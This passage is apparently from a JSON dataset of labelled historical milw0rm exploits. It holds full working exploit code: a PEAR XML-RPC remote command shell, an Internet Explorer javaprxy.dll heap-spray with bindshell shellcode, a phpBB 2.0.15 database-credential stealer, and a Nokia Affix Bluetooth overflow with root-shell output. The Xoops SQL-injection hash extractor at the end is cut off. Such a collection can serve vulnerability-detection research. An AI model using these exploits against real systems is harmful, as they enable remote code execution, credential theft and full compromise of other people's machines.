429        "content": "# tested and working /str0ke\n\n\n\n#!/usr/bin/perl\n\n# \n\n#  ilo-- \n\n#\n\n#  This program is no GPL or has nothing to do with FSF, but some\n\n#  code was ripped from romansoft.. sorry, too lazy!\n\n#  \n\n#  xmlrpc bug by James from GulfTech Security Research. \n\n#  http://pear.php.net/bugs/bug.php?id=4692\n\n#  xmlrpc drupal exploit, but James sais xoops, phpnuke and other\n\n#  cms should be vulnerable.\n\n#\n\n#  greets: dsr! digitalsec.net\n\n#\n\nrequire LWP::UserAgent;\n\nuse URI;\n\nuse Getopt::Long;\n\nuse strict;\n\n$| = 1;  # fflush stdout after print\n\n\n\n# Default options\n\n# connection \n\nmy $basic_auth_user = '';\n\nmy $basic_auth_pass = '';\n\nmy $proxy = '';\n\nmy $proxy_user = '';\n\nmy $proxy_pass = '';\n\nmy $conn_timeout = 15;\n\n\n\n# general\n\nmy $host;\n\n \n\n #informational lines to feed my own ego.\n\n print \"xmlrpc exploit - http://www.reversing.org \\n\";\n\n print \"2005 ilo-- <ilo\".chr(64).\"reversing.org> \\n\";\n\n print \"special chars allowed are / and - \\n\\n\";\n\n\n\n # read command line options\n\n my $options = GetOptions (\n\n\n\n #general options\n\n 'host=s'    => \\$host, # input host to test.\n\n\n\n # connection options\n\n 'basic_auth_user=s' => \\$basic_auth_user,\n\n 'basic_auth_pass=s' => \\$basic_auth_pass,\n\n 'proxy=s'           => \\$proxy,\n\n 'proxy_user=s'      => \\$proxy_user,\n\n 'proxy_pass=s'      => \\$proxy_pass,\n\n 'timeout=i'         => \\$conn_timeout);\n\n\n\n # command line sanity check \n\n &show_usage unless ($host);\n\n\n\n # main loop \n\n while (1){\n\n \tprint \"\\nxmlrpc@# \";\n\n \tmy $cmd = <STDIN>;\n\n \txmlrpc_xploit ($cmd);\n\n }\n\n\n\n exit (1);\n\n\n\n#exploit \n\nsub xmlrpc_xploit {\n\nchomp (my $data = shift);\n\nmy $reply;\n\n\n\nmy $d1 = \"<?xml version=\\\"1.0\\\"?><methodCall><methodName>examples.getStateName</methodName><params><param><name>a');\";  \n\nmy $d2 = \";//</name><value>xml exploit R/01</value></param></params></methodCall>\";\n\n\n\n  $data =~ s/-/'.chr(45).'/mg;\n\n  $data =~ s/\\//'.char(47).'/mg;\n\n\n\n  my $req = new HTTP::Request 'POST' => $host;\n\n  $req->content_type('application/xml');\n\n  $req->content($d1.'system(\\''.$data.'\\')'.$d2);\n\n  \n\n  my $ua = new LWP::UserAgent;\n\n  $ua->agent(\"xmlrpc exploit R/0.1\");\n\n  $ua->timeout($conn_timeout);\n\n\n\n  if ($basic_auth_user){\n\n    $req->authorization_basic($basic_auth_user, $basic_auth_pass) \n\n  }\n\n  if ($proxy){\n\n    $ua->proxy(['http'] => $proxy);\n\n    $req->proxy_authorization_basic($proxy_user, $proxy_pass);\n\n  }\n\n \n\n  #send request, return null if not OK\n\n  my $res = $ua->request($req);\n\n  if ($res->is_success){\n\n     $reply= $res->content;\n\n  } else { \n\n     $reply = \"\";\n\n  }\n\n  $reply =~ /(.*).(<pre>warning.*)/mgsi;\n\n  print ($1);\n\n}\n\n\n\n# show options \n\nsub show_usage {\n\n  print \"Syntax: ./xmlrpc.pl [options] host/uri\\n\\n\";\n\n  print \"main options\\n\";\n\n  print \"connection options\\n\";\n\n  print \"\\t--proxy (http), --proxy_user, --proxy_pass\\n\";\n\n  print \"\\t--basic_auth_user, --basic_auth_pass\\n\";\n\n  print \"\\t--timeout \\n\";\n\n  print \"\\nExample\\n\";\n\n  print \"bash# xmlrpc.pl --host=http://www.host.com/xmlrpc.php \\n\";\n\n  print \"\\n\";\n\n  exit(1);\n\n}\n\n\n\n\n\n# milw0rm.com [2005-07-01]",
430        "vulnerable": true
431    },
432    {
433        "exploit_id": 1079,
434        "content": "<!--\n\n(update) frsirt updated the comments to reflect skylined's code + gpl. /str0ke\n\n\n\nPerl code is commented so people can test the vuln on their IE /str0ke\n\n\n\n#!/usr/bin/perl\n\n#\n\n######################################################\n\n# \n\n# Microsoft Internet Explorer \"javaprxy.dll\" COM Object Exploit -Unpatched-\n\n#\n\n# Proof of Concept by the FrSIRT < http://www.frsirt.com / team@frsirt.com >\n\n#       Bindshell on port 28876 - Based on Berend-Jan Wever's IE exploit\n\n#                                            01 July 2005\n\n#\n\n# Description - http://www.frsirt.com/english/advisories/2005/0935\n\n# Workarounds - http://www.microsoft.com/technet/security/advisory/903144.mspx\n\n# sec-consult - http://www.sec-consult.com/184.html\n\n# \n\n# Solution :\n\n# Set Internet and Local intranet security zone settings to \"High\" or use\n\n# another browser until a patch is released.\n\n#\n\n# Tested on : \n\n# Internet Explorer 6 on Microsoft Windows XP SP2\n\n# Internet Explorer 6 on Microsoft Windows XP SP1\n\n#\n\n# Affected versions : \n\n# Internet Explorer 5.01 Service Pack 3 on Microsoft Windows 2000 Service Pack 3\n\n# Internet Explorer 5.01 Service Pack 4 on Microsoft Windows 2000 Service Pack 4\n\n# Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 3\n\n# Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4\n\n# Internet Explorer 6 Service Pack 1 on Microsoft Windows XP Service Pack 1\n\n# Internet Explorer 6 for Microsoft Windows XP Service Pack 2\n\n# Internet Explorer 6 Service Pack 1 for Microsoft Windows XP 64-Bit SP1 (Itanium)\n\n# Internet Explorer 6 for Microsoft Windows Server 2003\n\n# Internet Explorer 6 for Microsoft Windows Server 2003 Service Pack 1\n\n# Internet Explorer 6 for Microsoft Windows Server 2003 for Itanium-based Systems\n\n# Internet Explorer 6 for Microsoft Windows Server 2003 with SP1 for Itanium\n\n# Internet Explorer 6 for Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium)\n\n# Internet Explorer 6 for Microsoft Windows Server 2003 x64 Edition\n\n# Internet Explorer 6 for Microsoft Windows XP Professional x64 Edition\n\n# Internet Explorer 5.5 Service Pack 2 on Microsoft Windows Millennium Edition\n\n# Internet Explorer 6 Service Pack 1 on Microsoft Windows 98\n\n# Internet Explorer 6 Service Pack 1 on Microsoft Windows 98 SE\n\n# Internet Explorer 6 Service Pack 1 on Microsoft Windows Millennium Edition \n\n# \n\n# Usage : perl iejavaprxyexploit.pl > mypage.html\n\n# \n\n######################################################\n\n#\n\n# This program is free software; you can redistribute it and/or modify it under\n\n# the terms of the GNU General Public License version 2, 1991 as published by\n\n# the Free Software Foundation.\n\n# \n\n# This program is distributed in the hope that it will be useful, but WITHOUT\n\n# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS\n\n# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more\n\n# details.\n\n# \n\n# A copy of the GNU General Public License can be found at:\n\n# http://www.gnu.org/licenses/gpl.html\n\n# or you can write to:\n\n# Free Software Foundation, Inc.\n\n# 59 Temple Place - Suite 330\n\n# Boston, MA 02111-1307\n\n# USA.\n\n#\n\n######################################################\n\n\n\n# header\n\nmy $header = \"<html><body>\\n<SCRIPT language=\\\"javascript\\\">\\n\";\n\n\n\n# Win32 bindshell (port 28876) - SkyLined\n\nmy $shellcode = \"shellcode = unescape(\\\"%u4343\\\"+\\\"%u4343\\\"+\\\"%u43eb\".\n\n\"%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea\".\n\n\"%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7\".\n\n\"%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b\".\n\n\"%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64\".\n\n\"%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c\".\n\n\"%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe\".\n\n\"%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0\".\n\n\"%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050\".\n\n\"%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6\".\n\n\"%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650\".\n\n\"%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa\".\n\n\"%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656\".\n\n\"%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1\".\n\n\"%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353\".\n\n\"%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353\".\n\n\"%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe\".\n\n\"%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff\".\n\n\"%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb\\\");\\n\";\n\n\n\n# Memory \n\nmy $code = \"bigblock = unescape(\\\"%u0D0D%u0D0D\\\");\\n\".\n\n\"headersize = 20;\\n\".\n\n\"slackspace = headersize+shellcode.length\\n\".\n\n\"while (bigblock.length<slackspace) bigblock+=bigblock;\\n\".\n\n\"fillblock = bigblock.substring(0, slackspace);\\n\".\n\n\"block = bigblock.substring(0, bigblock.length-slackspace);\\n\".\n\n\"while(block.length+slackspace<0x40000) block = block+block+fillblock;\\n\".\n\n\"memory = new Array();\\n\".\n\n\"for (i=0;i<750;i++) memory[i] = block + shellcode;\\n\".\n\n\"</SCRIPT>\\n\";\n\n\n\n# javaprxy.dll \n\nmy $clsid = '03D9F3F2-B0E3-11D2-B081-006008039BF0'; \n\n\n\n# footer\n\nmy $footer = \"<object classid=\\\"CLSID:\".$clsid.\"\\\"></object>\\n\".\n\n\"Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit\\n\".\n\n\"by the FrSIRT < http://www.frsirt.com >\\n\".\n\n\"Solution - http://www.frsirt.com/english/advisories/2005/0935\".\n\n\"</body><script>location.reload();</script></html>\";\n\n\n\n# print \"Content-Type: text/html;\\r\\n\\r\\n\"; # if you are in cgi-bin\n\nprint \"$header $shellcode $code $footer\"; \n\n\n\n-->\n\n\n\n<html><body>\n\n<SCRIPT language=\"javascript\">\n\n shellcode = unescape(\"%u4343\"+\"%u4343\"+\"%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb\");\n\n bigblock = unescape(\"%u0D0D%u0D0D\");\n\nheadersize = 20;\n\nslackspace = headersize+shellcode.length\n\nwhile (bigblock.length<slackspace) bigblock+=bigblock;\n\nfillblock = bigblock.substring(0, slackspace);\n\nblock = bigblock.substring(0, bigblock.length-slackspace);\n\nwhile(block.length+slackspace<0x40000) block = block+block+fillblock;\n\nmemory = new Array();\n\nfor (i=0;i<750;i++) memory[i] = block + shellcode;\n\n</SCRIPT>\n\n <object classid=\"CLSID:03D9F3F2-B0E3-11D2-B081-006008039BF0\"></object>\n\nMicrosoft Internet Explorer javaprxy.dll COM Object Remote Exploit\n\nby the FrSIRT < http://www.frsirt.com >\n\nSolution - http://www.frsirt.com/english/advisories/2005/0935</body><script>location.reload();</script></html>\n\n\n\n# milw0rm.com [2005-07-05]",
435        "vulnerable": true
436    },
437    {
438        "exploit_id": 1080,
439        "content": "#!/usr/bin/perl\n\n\n\n# tested and working /str0ke\n\n\n\n#        ********************************************************************\n\n#       **********************************************************************\n\n#      ****                                                                 **\n\n#     ***      ******       *******************                             **\n\n#    ***    ***   ****   ***********************                            **\n\n#   ***   ***     ****                       ****      *   ***    *****     **\n\n#  ***   ***      ***                ***     ***      *  **  **   **        **\n\n# ***   ***                         ***      **         **   **  **         **\n\n#***   ***                          ***    ***          **   **  *****      **\n\n#**   ***                          ***  ****           **   **      **      **\n\n#**   ***       ***  ***   ******* *******             **  ***      **      **\n\n#**   ***      ***   ***  **      *** ***              **  **  **  **       **\n\n#**  ***      ***   ***  **      ***  ***               ***   *****         **\n\n#**   ***     ***   *** **       ***  ***                                   **\n\n#**   ****   ***    ****        ***   ***                                   **\n\n#**     *******    ****   ********     ***********************************  **\n\n#**         ***                                                             **\n\n#**        ***                                                              **\n\n#**                                                                         **\n\n#**      phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability     **\n\n#**      This exploit gives the user all the details about the database     **\n\n#**      connection such as database host, username, password and           **\n\n#**      database name.                                                     **\n\n#**                                                                         **\n\n#**              Written by SecureD,  gvr.secured<AT>gmail<DOT>com,2005     **\n\n#**                                                                         **\n\n#**      Greetings to GvR, Jumento, PP, CKrew & friends      \t\t        **\n\n#**                                                                         **\n\n#***************************************************************************** \n\n# ***************************************************************************\n\n\n\nuse IO::Socket;\n\n\n\nprint \"+-----------------------------------------------------------------------+\\r\\n\";\n\nprint \"|           PhpBB 2.0.15 Database Authentication Details Exploit        |\\r\\n\";\n\nprint \"|                 By SecureD gvr.secured<AT>gmail<DOT>com               |\\r\\n\";\n\nprint \"+-----------------------------------------------------------------------+\\r\\n\";\n\n\n\nif (@ARGV < 3)\n\n{\n\nprint \"Usage:\\r\\n\";\n\nprint \"phpbbSecureD.pl SERVER DIR THREADID COOKIESTRING\\r\\n\\r\\n\";\n\nprint \"SERVER         - Server where PhpBB is installed.\\r\\n\";\n\nprint \"DIR            - PHPBB directory or / for no directory.\\r\\n\";\n\nprint \"THREADID       - Id of an existing thread.\\r\\n\";\n\nprint \"COOKIESTRING   - Optional, cookie string of the http request.\\r\\n\";\n\nprint \"                 Use this when a thread needs authentication for viewing\\r\\n\";\n\nprint \"                 You can use Firefox in combination with \\\"Live HTTP\\r\\n\";\n\nprint \"                 Headers\\\" to get this cookiestring.\\r\\n\\r\\n\";\n\nprint \"Example 1 (with cookiestring):\\r\\n\";\n\nprint \"phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \\\"phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D; phpbb2mysql_sid=10dae92b780914332896df43808c4e09\\\" \\r\\n\\r\\n\";\n\nprint \"Example 2 (without cookiestring):\\r\\n\";\n\nprint \"phpbbSecured.pl 192.168.168.123 /PHPBB/ 20 \\r\\n\";\n\nexit();\n\n}\n\n\n\n$serv \t\t= $ARGV[0];\n\n$dir \t\t= $ARGV[1];\n\n$threadid \t= $ARGV[2];\n\n$cookie \t= $ARGV[3];\n\n\n\n$serv \t\t=~ s/http:\\/\\///ge;\n\n$delimit \t= \"GvRSecureD\";\n\n\n\n$sploit\t = $dir . \"viewtopic.php?t=\";\n\n$sploit .= $threadid;\n\n$sploit .= \"&highlight='.printf($delimit.\";\n\n$sploit .= \"\\$dbhost.\";\n\n$sploit .= \"$delimit.\";\n\n$sploit .= \"\\$dbname.\";\n\n$sploit .= \"$delimit.\";\n\n$sploit .= \"\\$dbuser.\";\n\n$sploit .= \"$delimit.\";\n\n$sploit .= \"\\$dbpasswd.\";\n\n$sploit .= \"$delimit).'\";\n\n\n\n$sock = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$serv\", PeerPort=>\"80\") or die \"[+] Connecting ... Could not connect to host.\\n\\n\";\n\n\n\nprint \"[+] Connecting      OK\\n\";\n\nsleep(1);\n\n\n\nprint \"[+] Sending exploit \";\n\nprint $sock \"GET $sploit HTTP/1.1\\r\\n\";\n\nprint $sock \"Host: $serv\\r\\n\";\n\nif ( defined $cookie) {\n\n\tprint $sock \"Cookie: $cookie \\r\\n\";\n\n}\n\nprint $sock \"Connection: close\\r\\n\\r\\n\";\n\n\n\n\n\n$succes = 0;\n\n\n\nwhile ($answer = <$sock>) {\n\n\t$delimitIndex = index $answer, $delimit;\n\n\tif ($delimitIndex >= 0) {\n\n\t\t$succes = 1;\n\n\t\t$urlIndex = index $answer, \"href\";\n\n\t\tif ($urlIndex < 0){\n\n\t\t\t$answer = substr($answer, length($delimit));\n\n\t\t\t$length = 0;\n\n\t\t\twhile (length($answer) > 0) {\n\n\t\t\t\t$nex = index($answer, $delimit);\n\n\t\t\t\tif ($nex > 0) {\n\n\t\t\t\t\tpush(@array, substr($answer, 0, $nex));\n\n\t\t\t\t\t$answer = substr($answer, $nex + length($delimit), length($answer));\n\n\t\t\t\t} else {\n\n\t\t\t\t\t$answer= \"\";\n\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t}\n\n\t}\n\n}\n\n\n\nclose($sock);\n\n\n\nif ($succes == 1) {\n\n\tprint \"OK\\n\";\n\n\tsleep(1);\n\n\tprint \"[+] Database Host:  \" . $array[0] . \"\\n\";\n\n\tsleep(1);\n\n\tprint \"[+] Database Name:  \" . $array[1] . \"\\n\";\n\n\tsleep(1);\n\n\tprint \"[+] Username:       \" . $array[2] . \"\\n\";\n\n\tsleep(1);\n\n\tprint \"[+] Password:       \" . $array[3] . \"\\n\";\n\n\tsleep(1);\n\n} else {\n\n\tprint \"FAILED\\n\";\n\n}\n\n\n\n# milw0rm.com [2005-07-03]",
440        "vulnerable": true
441    },
442    {
443        "exploit_id": 1081,
444        "content": "/*\n\n\n\n- Tools you will probably need:\n\n- http://www.digitalmunition.com/setbd-affix.c\n\n- KF is one bad mofo /str0ke\n\n\n\nRemote Nokia Affix btftp client exploit\n\nby kf_lists[at]secnetops[dot]com\n\n\n\nthreat:~# btftp\n\nAffix version: Affix 2.1.1\n\nWellcome to OBEX ftp. Type ? for help.\n\nMode: Bluetooth\n\nSDP: yes\n\nftp>  open 00:04:3e:65:a1:c8\n\nConnected.\n\nftp> ls\n\nZ8\u00c1\u00be\u00fd\u00de)\u00e1\u00bdTnb    6               u\u00fb\u00ff\u00bfu\u00fb\u00ff\u00bf3\u00c9\u00e9\u00eb\u00e8\u00ff\u00ff\u00ff\u00ff\u00c0^v\u00ee0^\u00ee\u00fc\u00e2\u00f4\u00a85?\u00ca24\u00ff\u00b6\u00a9\u00d7?#\u00b0\u00c8\u00da\u00bcV6\u00b2V\n\n           \u00cf\u00ad\u00b9\u00bf)\u00fd\u00de\n\n\u00fd\u00de\u00d1\u00fd\u00de\u00d0\u00c9\u00ee\u00bcXq\u00b6X6\u00b6Y0\n\n\n\n----------------------\n\n\n\nroot@frieza:/var/spool/affix/Inbox# telnet 192.168.1.207 4444\n\nTrying 192.168.1.207...\n\nConnected to 192.168.1.207.\n\nEscape character is '^]'.\n\nid;\n\nuid=0(root) gid=0(root) groups=0(root)\n\n: command not found\n\nhostname;\n\nthreat\n\n: command not found\n\n\n\n\n\n\n\n*/\n\n\n\n#include <stdio.h>\n\n#include <strings.h>\n\nmain()\n\n{\n\n       FILE *malfile;\n\n\n\n       /* linux_ia32_bind - LPORT=4444 Size=108 Encoder=Pex http://metasploit.com */\n\n       unsigned char scode[] =\n\n       \"\\x33\\xc9\\x83\\xe9\\xeb\\xe8\\xff\\xff\\xff\\xff\\xc0\\x5e\\x81\\x76\\x0e\\x99\"\n\n       \"\\xee\\x30\\x5e\\x83\\xee\\xfc\\xe2\\xf4\\xa8\\x35\\x63\\x1d\\xca\\x84\\x32\\x34\"\n\n       \"\\xff\\xb6\\xa9\\xd7\\x78\\x23\\xb0\\xc8\\xda\\xbc\\x56\\x36\\x88\\xb2\\x56\\x0d\"\n\n       \"\\x10\\x0f\\x5a\\x38\\xc1\\xbe\\x61\\x08\\x10\\x0f\\xfd\\xde\\x29\\x88\\xe1\\xbd\"\n\n       \"\\x54\\x6e\\x62\\x0c\\xcf\\xad\\xb9\\xbf\\x29\\x88\\xfd\\xde\\x0a\\x84\\x32\\x07\"\n\n       \"\\x29\\xd1\\xfd\\xde\\xd0\\x97\\xc9\\xee\\x92\\xbc\\x58\\x71\\xb6\\x9d\\x58\\x36\"\n\n       \"\\xb6\\x8c\\x59\\x30\\x10\\x0d\\x62\\x0d\\x10\\x0f\\xfd\\xde\";\n\n\n\n       char buf[1024];\n\n       memset(buf,'\\0',sizeof(buf));\n\n       memset(buf,'\\x90',94);\n\n       strcat(buf+94,\"\\x75\\xfb\\xff\\xbf\");\n\n       strcat(buf+98,\"\\x75\\xfb\\xff\\xbf\");\n\n       memset(buf+102,'\\x90',40);\n\n       strcat(buf+142,scode);\n\n\n\n       if(!(malfile = fopen(buf,\"w+\"))) {\n\n               printf(\"error opening file\\n\");\n\n               exit(1);\n\n       }\n\n\n\n       fprintf(malfile, \"pwned\\n\" );\n\n       fclose(malfile);\n\n\n\n}\n\n\n\n\n\n/*\n\nFirst lets find someone to impersonate.\n\n\n\nroot@frieza:~# btctl discovery\n\nSearching 8 sec ...\n\nSearching done. Resolving names ...\n\ndone.\n\n+1: Address: 00:0c:76:46:f0:21, Class: 0xB20104, Key: \"no\", Name: \"threat\"\n\n   Computer (Desktop) [Networking,Object Transfer,Audio,Information]\n\n+2: Address: 00:10:60:29:4f:f1, Class: 0x420210, Key: \"no\", Name: \"Bluetooth Modem\"\n\n   Phone (Wired Modem/VoiceGW) [Networking,Telephony]\n\n+3: Address: 00:04:3e:65:a1:c8, Class: 0x120110, Key: \"no\", Name: \"Pocket_PC\"\n\n   Computer (Handheld PC/PDA) [Networking,Object Transfer]\n\n\n\nLets pretend to be some poor chaps PDA.\n\n\n\nroot@frieza:~# ./setbd-affix 00:04:3e:65:a1:c8\n\nUsing BD_ADDR from command line\n\nSetting BDA to 00:04:3e:65:a1:c8\n\n\n\nroot@frieza:~# btctl\n\nbt0     01:02:03:04:05:06\n\n       Flags: UP DISC CONN\n\n       RX: acl:159 sco:0 event:97 bytes:4810 errors:0 dropped:0\n\n       TX: acl:168 sco:0 cmd:29 bytes:19267 errors:0 dropped:0\n\n       Security: service pair [-auth, -encrypt]\n\n       Packets: DM1 DH1 DM3 DH3 DM5 DH5 HV1 HV3\n\n       Role: deny switch, remain slave\n\n\n\nroot@frieza:~# btctl reset\n\nroot@frieza:~# btctl down\n\nroot@frieza:~# btctl up\n\nbtctl: cmd_initdev: Unable to start device (bt0)\n\nroot@frieza:~# btctl up\n\nroot@frieza:~# btctl\n\nbt0     00:04:3e:65:a1:c8\n\n       Flags: UP DISC CONN\n\n       RX: acl:159 sco:0 event:126 bytes:5796 errors:0 dropped:0\n\n       TX: acl:168 sco:0 cmd:52 bytes:19885 errors:0 dropped:0\n\n       Security: service pair [-auth, -encrypt]\n\n       Packets: DM1 DH1 DM3 DH3 DM5 DH5 HV1 HV3\n\n       Role: deny switch, remain slave\n\n\n\nroot@frieza:~# btctl name \"Pocket_PC\"\n\n\n\nGod I love my ROK chip!\n\n\n\nWait for the poor chap to use his affix btftp to connect to his Pocket_PC.\n\nHopefully his bluetooth stack confuses us for his PDA.\n\n\n\nObviously you need to find out the general area of your shellcode and fix the exploit accordingly.\n\n\n\n0xbffffb70:      '\\220' <repeats 40 times>,\n\n\"3\u00c9\\203\u00e9\u00eb\u00e8\u00ff\u00ff\u00ff\u00ff\u00c0^\\201v\\016\\231\u00ee0^\\203\u00ee\u00fc\u00e2\u00f4\u00a85c\\035\u00ca\\20424\u00ff\u00b6\u00a9\u00d7x#\u00b0\u00c8\u00da\u00bcV6\\210\u00b2V\\r\\020\\017Z8\u00c1\u00bea\\b\\020\\017\u00fd\u00de)\\210\u00e1\u00bdTnb\\f\u00cf\u00ad\u00b9\u00bf)\\210\u00fd\u00de\\n\\2042\\a)\u00d1\u00fd\u00de\u00d0\\227\u00c9\u00ee\\222\u00bcXq\u00b6\\235X6\u00b6\\214Y0\\020\\rb\\r\\020\\017\u00fd\u00de\"\n\n\n\nroot@frieza:/var/spool/affix/Inbox# pico ../btftp-ex.c\n\nroot@frieza:/var/spool/affix/Inbox# cc -o ../btftp-ex ../btftp-ex.c\n\nroot@frieza:/var/spool/affix/Inbox# ../btftp-ex\n\n\n\nVerify that a nice long file name is left behind.\n\nroot@frieza:/var/spool/affix/Inbox# ls\n\n??????????????????????????????????????????????????????????????????????????????????????????????u???u???????????????????????????????????????????3??????????^?v???0^??????5c???24????x#????V6??V???Z8??a?????)???Tnb?????)?????2?)?????????Xq??X6??Y0??b?????\n\n\n\nStart up the bluetooth services.\n\nroot@frieza:/etc/affix# btsrv -C ./btsrv.conf\n\nbtsrv: main: btsrv started [Affix 2.1.2].\n\nbtsrv: start_service: Bound service Serial Port to port 1\n\nbtsrv: start_service: Bound service Dialup Networking to port 2\n\nbtsrv: start_service: Bound service Dialup Networking Emulation to port 3\n\nbtsrv: start_service: Bound service Fax Service to port 4\n\nbtsrv: start_service: Bound service LAN Access to port 5\n\nbtsrv: start_service: Bound service OBEX File Transfer to port 6\n\nbtsrv: start_service: Bound service OBEX Object Push to port 7\n\nbtsrv: start_service: Bound service Headset to port 8\n\nbtsrv: start_service: Bound service HeadsetAG to port 9\n\nbtsrv: start_service: Bound service HandsFree to port 10\n\nbtsrv: start_service: Bound service HandsFreeAG to port 11\n\n\n\nWait for the person to connect to your device and attempt to perform a file listing.\n\nThis of course will trigger the overflow and execute your shellcode\n\nthreat:~# btftp\n\nAffix version: Affix 2.1.1\n\nWellcome to OBEX ftp. Type ? for help.\n\nMode: Bluetooth\n\nSDP: yes\n\nftp>  open 00:04:3e:65:a1:c8\n\nConnected.\n\nftp> ls\n\nZ8\u00c1\u00be\u00fd\u00de)\u00e1\u00bdTnb    6               u\u00fb\u00ff\u00bfu\u00fb\u00ff\u00bf3\u00c9\u00e9\u00eb\u00e8\u00ff\u00ff\u00ff\u00ff\u00c0^v\u00ee0^\u00ee\u00fc\u00e2\u00f4\u00a85?\u00ca24\u00ff\u00b6\u00a9\u00d7?#\u00b0\u00c8\u00da\u00bcV6\u00b2V\n\n           \u00cf\u00ad\u00b9\u00bf)\u00fd\u00de\n\n\u00fd\u00de\u00d1\u00fd\u00de\u00d0\u00c9\u00ee\u00bcXq\u00b6X6\u00b6Y0\n\n\n\nYou can tell when they have connected via the following log file entries.\n\n\n\nbtsrv: handle_input: Connection from 00:02:01:44:ad:99\n\nchannel 6 (OBEX File Transfer Profile)\n\nbtsrv: execute_cmd: Socket multiplexed to stdin/stdout\n\nbtsrv: signal_handler: Sig handler : 2\n\n\n\nAfter they have done so you will use the PAND connection you already hacked to obtain your shell. =]\n\nOr perhaps write some bluetooth aware shellcode.\n\n\n\nroot@frieza:/var/spool/affix/Inbox# telnet 192.168.1.207 4444\n\nTrying 192.168.1.207...\n\nConnected to 192.168.1.207.\n\nEscape character is '^]'.\n\nid;\n\nuid=0(root) gid=0(root) groups=0(root)\n\n: command not found\n\nhostname;\n\nthreat\n\n: command not found\n\n*/\n\n\n\n// milw0rm.com [2005-07-03]",
445        "vulnerable": true
446    },
447    {
448        "exploit_id": 1082,
449        "content": "#!/usr/bin/perl\n\n\n\n## Xoops <= 2.0.11 xmlrpc.php sql injection exploit by RST/GHC\n\n## based on http://www.gulftech.org/?node=research&article_id=00086-06292005\n\n## coded by 1dt.w0lf\n\n## RST/GHC\n\n## http://rst.void.ru \n\n## http://ghc.ru\n\n\n\n## example:\n\n## r57xoops.pl -u http://www.xoops2.ru/xmlrpc.php -n Alexxus\n\n## ---------------------------------------------------------------\n\n##   Xoops <= 2.0.11 xmlrpc.php sql injection exploit by RST/GHC\n\n## ---------------------------------------------------------------\n\n## [~]  URL : http://www.xoops2.ru/xmlrpc.php\n\n## [~] NAME : Alexxus\n\n## [~] SEARCHING PASSWORD ... [ DONE ]\n\n## ---------------------------------------------------------------\n\n##  USER NAME : Alexxus\n\n##  USER HASH : a26c7baaa40ab863f9b22c8649427fa6\n\n## ---------------------------------------------------------------\n\n\n\nuse LWP::UserAgent;\n\nuse Getopt::Std;\n\n\n\ngetopts('u:n:');\n\n\n\n$url  = $opt_u;\n\n$name = $opt_n;\n\n\n\nif(!$url || !$name) { &usage; }\n\n\n\n$s_num = 1;\n\n$|++;\n\n$n = 0;\n\n&head;\n\nprint \"\\r\\n\";\n\nprint \" [~]  URL : $url\\r\\n\";\n\nprint \" [~] NAME : $name\\r\\n\";\n\nprint \" [~] SEARCHING PASSWORD ... [|]\";\n\n\n\nwhile(1)\n\n{\n\nif(&found(47,58)==0) { &found(96,103); } \n\n$char = $i;\n\nif ($char==\"0\") \n\n { \n\n if(length($allchar) > 0){\n\n print qq{\\b\\b DONE ] \n\n ---------------------------------------------------------------\n\n  USER NAME : 